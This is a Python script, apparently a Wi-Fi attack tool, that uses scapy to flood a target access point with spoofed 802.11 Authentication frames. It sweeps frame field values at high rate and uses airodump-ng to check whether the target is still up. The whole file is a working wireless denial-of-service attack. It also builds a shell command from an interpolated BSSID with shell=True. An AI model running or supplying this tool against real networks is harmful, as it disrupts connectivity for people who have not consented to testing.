#!/usr/bin/env python
# Author: D3adPenguin (Shant Agopian)
# AuthDoS_IterAll_PauseMenu
import sys
import time
import subprocess
import signal
from termcolor import colored
from scapy.all import RadioTap, Dot11, Dot11Auth, sendp
from config import sta_target, ap_target, spray, check_interval

# Module-wide flag toggled by signal_handler() on SIGINT and polled by construct();
# while True the send loop is parked in its interactive menu.
pause = False
target_bssid = ap_target  # Use ap_target as the target BSSID; read by check_bssid_status()

def auth_frame(algo_value, seqnum, status):
    """Build one 802.11 Authentication management frame (type 0, subtype 11).

    addr1/addr3 are set to `ap_target` and addr2 to `sta_target`, both taken
    from the module-level config import. `algo_value`, `seqnum` and `status`
    are passed straight through to the Dot11Auth fields; no range validation
    is done here.
    """
    return RadioTap() / Dot11(type=0, subtype=11, addr1=ap_target, addr2=sta_target, addr3=ap_target) / Dot11Auth(algo=algo_value, seqnum=seqnum, status=status)

def check_bssid_status():
    """Return True if `target_bssid` appears in the captured stdout of airodump-ng.

    The interface is hard-coded as "wlan1mon" here, while the send path in
    construct() uses "wlan0mon"; the two are not kept in sync.
    NOTE(review): subprocess.run() waits for the child to exit and no
    timeout= is given — confirm the command terminates on its own here,
    otherwise this call blocks for the rest of the run.
    NOTE(review): the command is a shell string with target_bssid
    interpolated; an argv list with shell=False would keep the value from
    ever being parsed by a shell.
    """
    # Run airodump-ng to check the status of the target BSSID
    cmd = f"airodump-ng --bssid {target_bssid} wlan1mon"
    result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
    output = result.stdout
    return target_bssid in output

def construct():
    """Main send loop: sweep Dot11Auth (seqnum, algo, status) combinations and transmit each.

    Nesting order is seqnum in 0..9, algo_value in 0..6, status in 0..7, then
    `spray` repetitions of each combination. Every `check_interval` seconds
    the loop calls check_bssid_status() and returns early when the target
    BSSID is no longer reported. While the module-level `pause` flag is set
    (toggled by signal_handler() on SIGINT) the loop parks in an interactive
    menu after a send.

    Reads module globals: spray, check_interval, pause. Writes: pause (menu
    option 4 clears it). Returns None.
    """
    global pause
    last_check_time = time.time()

    for seqnum in range(10):
        for algo_value in range(7):
            for status in range(8):
                for n in range(spray):
                    # Check if it's time to check the target BSSID status
                    current_time = time.time()
                    if current_time - last_check_time >= check_interval:
                        last_check_time = current_time

                        # Check if the target BSSID is still up
                        if not check_bssid_status():
                            print("Target BSSID not found. Stopping attack.")
                            return

                    Auth = auth_frame(algo_value, seqnum, status)
                    frame_time = time.strftime("%H:%M:%S", time.localtime())
                    packet_info = f"\033[31m[ALGO:{algo_value}]\033[0m \033[34m[SEQNUM:{seqnum}]\033[0m \033[36m[STATUS:{status}]\033[0m"
                    # count=128 / inter=0.0001: one call transmits the same frame 128 times.
                    # The interface name is hard-coded and differs from the one in check_bssid_status().
                    sendp(Auth, inter=0.0001, count=128, iface="wlan0mon") # Please change the iface to be your currently used one
                    print(f"\033[33m[{frame_time}]\033[0m {packet_info} {colored(f'{n+1}/{spray} Packet sent', 'green')}")
                    # Pause menu. Only checked between sends, so a SIGINT raised during sendp()
                    # takes effect once it returns.
                    # NOTE(review): the `Auth` rebuilt inside the menu is never transmitted —
                    # the next iteration rebuilds it from the loop variables at the top, and
                    # the enclosing `for` reassigns seqnum/algo_value/status when it advances,
                    # so a menu edit only lasts until that happens.
                    while pause:
                        print('Program paused. Please choose an option:')
                        print('1. Modify ALGO value')
                        print('2. Modify SEQNUM value')
                        print('3. Modify STATUS value')
                        print('4. Resume program')
                        choice = input('> ')
                        if choice == '1':
                            algo_value = int(input('Enter new ALGO value: '))
                            Auth = auth_frame(algo_value, seqnum, status)
                            print(f'Modified ALGO value to {algo_value}.')
                        elif choice == '2':
                            seqnum = int(input('Enter new SEQNUM value: '))
                            Auth = auth_frame(algo_value, seqnum, status)
                            print(f'Modified SEQNUM value to {seqnum}.')
                        elif choice == '3':
                            status = int(input('Enter new STATUS value: '))
                            Auth = auth_frame(algo_value, seqnum, status)
                            print(f'Modified STATUS value to {status}.')
                        elif choice == '4':
                            # Clears the flag set by signal_handler(); the loop resumes on the next check.
                            pause = False
                            print('Resuming program...')
                        else:
                            print('Invalid choice. Please try again.')
                        time.sleep(0.1)  # Sleep for 100ms

def signal_handler(sig, frame):
    """SIGINT handler: flip the module-level `pause` flag and announce the new state.

    `sig` and `frame` are the standard handler arguments and are unused.
    Because this replaces the default handler, Ctrl+C no longer raises
    KeyboardInterrupt; it only toggles pausing.
    """
    global pause
    pause = not pause
    message = 'Program paused. Press Ctrl+C to resume...' if pause else 'Resuming program...'
    print(colored(message, 'yellow'))

# Installed at import time: from here on SIGINT only toggles `pause` via
# signal_handler() instead of raising KeyboardInterrupt.
signal.signal(signal.SIGINT, signal_handler)

if __name__ == '__main__':
    construct()